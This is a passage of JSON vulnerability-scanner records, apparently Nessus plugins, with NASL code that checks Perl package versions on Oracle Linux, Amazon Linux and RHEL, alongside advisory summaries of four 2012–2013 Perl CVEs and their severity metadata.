audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"perl-5.8.8-40.el5_9\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"perl-suidperl-5.8.8-40.el5_9\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"perl-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Archive-Extract-0.38-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Archive-Tar-1.58-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-CGI-3.51-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-CPAN-1.9402-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-CPANPLUS-0.88-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Compress-Raw-Bzip2-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Compress-Raw-Zlib-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Compress-Zlib-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Digest-SHA-5.47-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-ExtUtils-CBuilder-0.27-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-ExtUtils-Embed-1.28-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-ExtUtils-MakeMaker-6.55-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-ExtUtils-ParseXS-2.2003.0-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-File-Fetch-0.26-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-IO-Compress-Base-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-IO-Compress-Bzip2-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-IO-Compress-Zlib-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-IO-Zlib-1.09-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-IPC-Cmd-0.56-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Locale-Maketext-Simple-0.18-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Log-Message-0.02-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Log-Message-Simple-0.04-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Module-Build-0.3500-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Module-CoreList-2.18-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Module-Load-0.16-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Module-Load-Conditional-0.30-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Module-Loaded-0.02-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Module-Pluggable-3.90-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Object-Accessor-0.34-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Package-Constants-0.02-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Params-Check-0.26-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Parse-CPAN-Meta-1.40-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Pod-Escapes-1.04-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Pod-Simple-3.13-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Term-UI-0.20-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Test-Harness-3.17-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Test-Simple-0.92-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Time-HiRes-1.9721-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-Time-Piece-1.15-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-core-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-devel-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-libs-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-parent-0.221-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-suidperl-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perl-version-0.77-130.el6_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl / perl-Archive-Extract / perl-Archive-Tar / perl-CGI / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:24", "description": "A heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)", "edition": 27, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : perl (ALAS-2013-177)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:perl-Params-Check", "p-cpe:/a:amazon:linux:perl-Test-Harness", "p-cpe:/a:amazon:linux:perl-core", "p-cpe:/a:amazon:linux:perl-ExtUtils-Embed", "p-cpe:/a:amazon:linux:perl-Module-Loaded", "p-cpe:/a:amazon:linux:perl-IO-Compress-Bzip2", "p-cpe:/a:amazon:linux:perl-Compress-Raw-Bzip2", "p-cpe:/a:amazon:linux:perl-IO-Compress-Base", "p-cpe:/a:amazon:linux:perl-Module-Build", "p-cpe:/a:amazon:linux:perl-Object-Accessor", "p-cpe:/a:amazon:linux:perl-libs", "p-cpe:/a:amazon:linux:perl-Time-Piece", "p-cpe:/a:amazon:linux:perl-Log-Message", "p-cpe:/a:amazon:linux:perl-Term-UI", "p-cpe:/a:amazon:linux:perl-Package-Constants", "p-cpe:/a:amazon:linux:perl-CPAN", "p-cpe:/a:amazon:linux:perl-Log-Message-Simple", "p-cpe:/a:amazon:linux:perl-Pod-Simple", "p-cpe:/a:amazon:linux:perl-debuginfo", "p-cpe:/a:amazon:linux:perl-devel", "p-cpe:/a:amazon:linux:perl-Digest-SHA", "p-cpe:/a:amazon:linux:perl-Pod-Escapes", "p-cpe:/a:amazon:linux:perl-Module-CoreList", "p-cpe:/a:amazon:linux:perl-Archive-Extract", "p-cpe:/a:amazon:linux:perl-Parse-CPAN-Meta", "p-cpe:/a:amazon:linux:perl-Module-Load-Conditional", "p-cpe:/a:amazon:linux:perl-Locale-Maketext-Simple", "p-cpe:/a:amazon:linux:perl-Module-Pluggable", "p-cpe:/a:amazon:linux:perl-ExtUtils-CBuilder", "p-cpe:/a:amazon:linux:perl-Archive-Tar", "p-cpe:/a:amazon:linux:perl-parent", "p-cpe:/a:amazon:linux:perl-ExtUtils-ParseXS", "p-cpe:/a:amazon:linux:perl-IO-Zlib", "p-cpe:/a:amazon:linux:perl-IO-Compress-Zlib", "p-cpe:/a:amazon:linux:perl-Compress-Zlib", "p-cpe:/a:amazon:linux:perl-Compress-Raw-Zlib", "p-cpe:/a:amazon:linux:perl-IPC-Cmd", "p-cpe:/a:amazon:linux:perl-ExtUtils-MakeMaker", "p-cpe:/a:amazon:linux:perl-CGI", "p-cpe:/a:amazon:linux:perl-suidperl", "p-cpe:/a:amazon:linux:perl-File-Fetch", "p-cpe:/a:amazon:linux:perl", "p-cpe:/a:amazon:linux:perl-Test-Simple", "p-cpe:/a:amazon:linux:perl-CPANPLUS", "p-cpe:/a:amazon:linux:perl-version", "p-cpe:/a:amazon:linux:perl-Time-HiRes", "p-cpe:/a:amazon:linux:perl-Module-Load", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2013-177.NASL", "href": "https://www.tenable.com/plugins/nessus/69736", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2013-177.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69736);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/02/07 9:34:55\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_xref(name:\"ALAS\", value:\"2013-177\");\n script_xref(name:\"RHSA\", value:\"2013:0685\");\n\n script_name(english:\"Amazon Linux AMI : perl (ALAS-2013-177)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2013-177.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update perl' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Archive-Extract\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Archive-Tar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-CPAN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-CPANPLUS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Compress-Raw-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Compress-Raw-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Digest-SHA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-ExtUtils-CBuilder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-ExtUtils-Embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-ExtUtils-MakeMaker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-ExtUtils-ParseXS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-File-Fetch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-IO-Compress-Base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-IO-Compress-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-IO-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-IO-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-IPC-Cmd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Locale-Maketext-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Log-Message\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Log-Message-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Module-Build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Module-CoreList\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Module-Load\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Module-Load-Conditional\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Module-Loaded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Module-Pluggable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Object-Accessor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Package-Constants\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Params-Check\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Parse-CPAN-Meta\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Pod-Escapes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Pod-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Term-UI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Test-Harness\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Test-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Time-HiRes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Time-Piece\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-suidperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-version\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"perl-5.10.1-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Archive-Extract-0.38-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Archive-Tar-1.58-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-CGI-3.51-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-CPAN-1.9402-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-CPANPLUS-0.88-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Compress-Raw-Bzip2-2.020-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Compress-Raw-Zlib-2.023-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Compress-Zlib-2.020-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Digest-SHA-5.47-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-ExtUtils-CBuilder-0.27-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-ExtUtils-Embed-1.28-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-ExtUtils-MakeMaker-6.55-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-File-Fetch-0.26-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-IO-Compress-Base-2.020-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-IO-Compress-Bzip2-2.020-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-IO-Compress-Zlib-2.020-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-IO-Zlib-1.09-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-IPC-Cmd-0.56-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Locale-Maketext-Simple-0.18-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Log-Message-0.02-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Log-Message-Simple-0.04-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Module-Build-0.3500-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Module-CoreList-2.18-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Module-Load-0.16-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Module-Load-Conditional-0.30-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Module-Loaded-0.02-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Module-Pluggable-3.90-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Object-Accessor-0.34-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Package-Constants-0.02-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Params-Check-0.26-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Parse-CPAN-Meta-1.40-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Pod-Escapes-1.04-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Pod-Simple-3.13-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Term-UI-0.20-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Test-Harness-3.17-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Test-Simple-0.92-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Time-HiRes-1.9721-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Time-Piece-1.15-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-core-5.10.1-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-debuginfo-5.10.1-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-devel-5.10.1-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-libs-5.10.1-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-parent-0.221-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-suidperl-5.10.1-130.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-version-0.77-130.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl / perl-Archive-Extract / perl-Archive-Tar / perl-CGI / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T09:14:40", "description": "Updated perl packages that fix multiple security issues now available\nfor Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting\nCVE-2012-5195 and CVE-2013-1667. Upstream acknowledges Tim Brown as\nthe original reporter of CVE-2012-5195 and Yves Orton as the original\nreporter of CVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.", "edition": 24, "published": "2013-03-27T00:00:00", "title": "RHEL 5 / 6 : perl (RHSA-2013:0685)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "modified": "2013-03-27T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:perl-Pod-Escapes", "p-cpe:/a:redhat:enterprise_linux:perl-CPANPLUS", "p-cpe:/a:redhat:enterprise_linux:perl-parent", "p-cpe:/a:redhat:enterprise_linux:perl-Compress-Zlib", "p-cpe:/a:redhat:enterprise_linux:perl-version", "p-cpe:/a:redhat:enterprise_linux:perl-Module-Load", "p-cpe:/a:redhat:enterprise_linux:perl-Package-Constants", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:perl-Parse-CPAN-Meta", "p-cpe:/a:redhat:enterprise_linux:perl-Archive-Extract", "p-cpe:/a:redhat:enterprise_linux:perl-libs", "p-cpe:/a:redhat:enterprise_linux:perl-Module-Pluggable", "p-cpe:/a:redhat:enterprise_linux:perl-Test-Harness", "p-cpe:/a:redhat:enterprise_linux:perl-Object-Accessor", "p-cpe:/a:redhat:enterprise_linux:perl-devel", "p-cpe:/a:redhat:enterprise_linux:perl-IO-Compress-Bzip2", "p-cpe:/a:redhat:enterprise_linux:perl-Log-Message", "p-cpe:/a:redhat:enterprise_linux:perl-ExtUtils-MakeMaker", "p-cpe:/a:redhat:enterprise_linux:perl-Digest-SHA", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:perl-Test-Simple", "p-cpe:/a:redhat:enterprise_linux:perl-Time-Piece", "p-cpe:/a:redhat:enterprise_linux:perl-core", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:perl-CGI", "p-cpe:/a:redhat:enterprise_linux:perl-ExtUtils-Embed", "p-cpe:/a:redhat:enterprise_linux:perl-Pod-Simple", "p-cpe:/a:redhat:enterprise_linux:perl-IO-Compress-Zlib", "p-cpe:/a:redhat:enterprise_linux:perl-Module-CoreList", "p-cpe:/a:redhat:enterprise_linux:perl-Compress-Raw-Bzip2", "p-cpe:/a:redhat:enterprise_linux:perl-Module-Loaded", "p-cpe:/a:redhat:enterprise_linux:perl", "p-cpe:/a:redhat:enterprise_linux:perl-IPC-Cmd", "p-cpe:/a:redhat:enterprise_linux:perl-suidperl", "p-cpe:/a:redhat:enterprise_linux:perl-Params-Check", "p-cpe:/a:redhat:enterprise_linux:perl-Archive-Tar", "p-cpe:/a:redhat:enterprise_linux:perl-ExtUtils-ParseXS", "p-cpe:/a:redhat:enterprise_linux:perl-IO-Zlib", "p-cpe:/a:redhat:enterprise_linux:perl-Compress-Raw-Zlib", "p-cpe:/a:redhat:enterprise_linux:perl-Time-HiRes", "p-cpe:/a:redhat:enterprise_linux:perl-Module-Build", "p-cpe:/a:redhat:enterprise_linux:perl-Locale-Maketext-Simple", "p-cpe:/a:redhat:enterprise_linux:perl-Log-Message-Simple", "p-cpe:/a:redhat:enterprise_linux:perl-ExtUtils-CBuilder", "p-cpe:/a:redhat:enterprise_linux:perl-Term-UI", 